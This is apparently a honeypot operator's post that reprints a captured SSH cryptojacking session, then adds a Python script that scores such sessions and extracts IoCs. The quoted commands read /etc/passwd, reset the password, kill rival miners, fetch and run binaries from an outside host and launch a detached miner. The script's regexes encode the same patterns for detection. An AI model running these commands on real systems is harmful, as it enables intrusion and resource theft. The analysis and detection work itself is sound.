SSH Honeypot
You’ve got a real problem if random folks are SSHing into your machines. Still, it’s fun to see what they do once they get in. Here are example commands, all from a single connection, captured by my SSH honeypots.
This list isn’t updated daily. Commands are often repeated and difficult to parse. I’ll post interesting attacker sessions when I see them.
‘Bad Dog’ Attacker
Cryptojacking with a call-out to a US President.
- uname -a
- cat /etc/passwd
- cat /proc/cpuinfo | grep processor | wc -l
- echo -e "ubnt2 nonsensepassword nonsensepassword" | passwd
- kill -9 $(ps aux | grep xrx | awk '{print $2}');kill -9 $(ps aux | grep biden1 | awk '{print $2}');kill -9 $(ps aux | grep biden1 | awk '{print $2}');kill -9 $(ps aux | grep zzh | awk '{print $2}');kill -9 $(ps aux | grep arx645 | awk '{print $2}');kill -9 $(ps aux | grep kthread | awk '{print $2}');kill -9 $(ps aux | grep kthread | awk '{print $2}')
- cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf kthreads;wget -q http://107.x.x.x/x86_64/watchdogg || curl -s -o watchdogg 107.x.x.x/x86_64/watchdogg;chmod 777 watchdogg;chmod +x watchdogg;nohup ./watchdogg -o crypto.mining.pool:80 -u yikestheuserwashere -p Weak(lol) -k --cpu-max-threads-hint=75 --tls --tls-fingerprint=nope --huge-pages-jit --asm=auto --http-host=127.x.x.x --http-port=0 --http-access-token=null --api-id=null --api-worker-id=null --randomx-init=-1 --background </dev/null >/dev/null 2>&1 &
- cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf kthread*;rm -rf kthread; rm -rf watchdog;rm -rf watchdog*;wget -q http://107.x.x.x/x86_64/watchdog || curl -s -o watchdog 107.x.x.x/x86_64/watchdog || tftp 107.x.x.x -c get /x86_64/watchdog || tftp -r /x86_64/watchdog -g 107.x.x.x || ftpget -v -u anonymous -p anonymous -P 21 107.x.x.x -c get /x86_64/watchdog;chmod 777 watchdog;chmod +x watchdog;nohup ./watchdog </dev/null >/dev/null 2>&1 &
- cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf watchdogs*; wget http://107.x.x.x/x86_64/watchdogs; chmod 777 watchdogs; nohup ./watchdogs ssh stat2 kthread watchdog </dev/null >/dev/null 2>&1 &
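The session above is a textbook cryptojacking chain: recon, a password reset, a kill loop against rival miners, a wget/curl/tftp/ftpget fallback chain into a tmpfs directory, chmod-and-run, then a detached miner with RandomX-style flags. To turn a captured session like this into something a SOC can act on, here is an added example (my code, not the author's honeypot tooling) that scores a list of command lines against those behaviours and pulls out the download URLs, dropped file names and pool as IoCs. The rule weights, verdict thresholds, and the sample session (a redacted copy of the commands above with placeholder wallet and password values) are assumptions.

```python
"""Score an SSH honeypot session for cryptojacking behaviour and pull out IoCs.

Added example, not code from the original post. Rule weights and verdict
thresholds are illustrative assumptions, not a published scoring model.
"""
import json
import re

# name -> (weight, regex). Each rule encodes one step of the session quoted above.
RULES = {
    "recon": (1, re.compile(r"^(?:uname -a|cat /etc/passwd|cat /proc/cpuinfo)")),
    # new password piped into passwd: attacker locks in its own access
    "passwd_change": (3, re.compile(r"\|\s*passwd\b")),
    # kill loop against rival miners / earlier drops
    "kill_competitors": (3, re.compile(r"kill -9 \$\(ps aux \| grep")),
    # tmpfs / world-writable staging directories
    "staging_dir": (2, re.compile(r"cd /(?:dev/shm|tmp|var/run)\b")),
    # several fetch tools chained with || so one of them works on any box
    "fetch_fallback_chain": (2, re.compile(
        r"(?:wget|curl|tftp|ftpget)[^;]*\|\|\s*(?:wget|curl|tftp|ftpget)")),
    # fetch, chmod, run: the generic drop-and-execute pattern
    "download_exec": (5, re.compile(
        r"(?:wget|curl|tftp|ftpget)\b.*chmod (?:777|\+x).*\./\S+")),
    # switches of a RandomX-style CPU miner, or a pool:port plus wallet argument
    "miner_flags": (5, re.compile(
        r"--(?:cpu-max-threads-hint|randomx-init|huge-pages-jit|tls-fingerprint)"
        r"|-o \S+:\d+ -u \S+")),
    # fully detached background process
    "detach_background": (2, re.compile(r"</dev/null\s*>/dev/null 2>&1 &")),
    # dropped binary named to look like a kernel thread or the watchdog
    "kernel_thread_masquerade": (2, re.compile(r"\./(?:kthread|watchdog)\w*")),
}

# IoC extractors. The 'x' alternative accepts octets redacted the way the post does.
URL_RE = re.compile(r"(?:https?://)?(\d{1,3}(?:\.(?:\d{1,3}|x)){3}/[^\s;|]+)")
POOL_RE = re.compile(r"-o (\S+:\d+)")
DROP_RE = re.compile(r"(?:chmod (?:777|\+x)|nohup) \.?/?(\w+)")


def verdict(indicators, score):
    """Map the matched indicator set to a coarse triage label."""
    if "miner_flags" in indicators or {"download_exec", "kill_competitors"} <= indicators:
        return "cryptojacking"
    if "download_exec" in indicators:
        return "malware-drop"
    if score >= 4:
        return "suspicious"
    return "recon-only"


def analyze_session(lines):
    """Score one session (a list of command strings); returns score, verdict, counts, IoCs."""
    counts = {}
    urls, pools, dropped = set(), set(), set()
    for line in lines:
        for name, (_weight, rx) in RULES.items():
            n = len(rx.findall(line))
            if n:
                counts[name] = counts.get(name, 0) + n
        urls.update(URL_RE.findall(line))
        pools.update(POOL_RE.findall(line))
        dropped.update(DROP_RE.findall(line))
    indicators = set(counts)
    score = sum(RULES[name][0] for name in indicators)  # each behaviour counted once
    return {
        "score": score,
        "verdict": verdict(indicators, score),
        "indicators": sorted(indicators),
        "counts": counts,
        "iocs": {"download_urls": sorted(urls), "pool": sorted(pools),
                 "dropped_files": sorted(dropped)},
    }


# Constructed sample session modelled on the commands quoted above; the IP and
# pool are the post's placeholders, the wallet and password strings are made up.
SAMPLE_SESSION = [
    "uname -a",
    "cat /etc/passwd",
    "cat /proc/cpuinfo | grep processor | wc -l",
    'echo -e "ubnt2 nonsensepassword nonsensepassword" | passwd',
    "kill -9 $(ps aux | grep xrx | awk '{print $2}');kill -9 $(ps aux | grep biden1 | awk '{print $2}');"
    "kill -9 $(ps aux | grep kthread | awk '{print $2}')",
    "cd /dev/shm || cd /tmp || cd /var/run || cd /;rm -rf kthreads;"
    "wget -q http://107.x.x.x/x86_64/watchdogg || curl -s -o watchdogg 107.x.x.x/x86_64/watchdogg;"
    "chmod 777 watchdogg;chmod +x watchdogg;nohup ./watchdogg -o crypto.mining.pool:80 -u WALLET_PLACEHOLDER "
    "-p x --cpu-max-threads-hint=75 --tls --background </dev/null >/dev/null 2>&1 &",
    "cd /dev/shm || cd /tmp || cd /var/run || cd /;rm -rf kthread*;rm -rf watchdog*;"
    "wget -q http://107.x.x.x/x86_64/watchdog || curl -s -o watchdog 107.x.x.x/x86_64/watchdog || "
    "tftp 107.x.x.x -c get /x86_64/watchdog || ftpget -v -u anonymous -p anonymous -P 21 107.x.x.x -c get /x86_64/watchdog;"
    "chmod 777 watchdog;chmod +x watchdog;nohup ./watchdog </dev/null >/dev/null 2>&1 &",
    "cd /dev/shm || cd /tmp || cd /var/run || cd /; rm -rf watchdogs*; wget http://107.x.x.x/x86_64/watchdogs; "
    "chmod 777 watchdogs; nohup ./watchdogs ssh stat2 kthread watchdog </dev/null >/dev/null 2>&1 &",
]

if __name__ == "__main__":
    print(json.dumps(analyze_session(SAMPLE_SESSION), indent=2))
```

Scoring counts each behaviour once per session rather than per match, so a kill loop with seven targets does not outweigh the miner launch; the raw per-rule counts are kept in the result for anyone who wants to tune that. The URL extractor accepts redacted `x` octets only so the post's own commands can be fed in; on live logs you would also want to resolve and block the real hosts and the pool address.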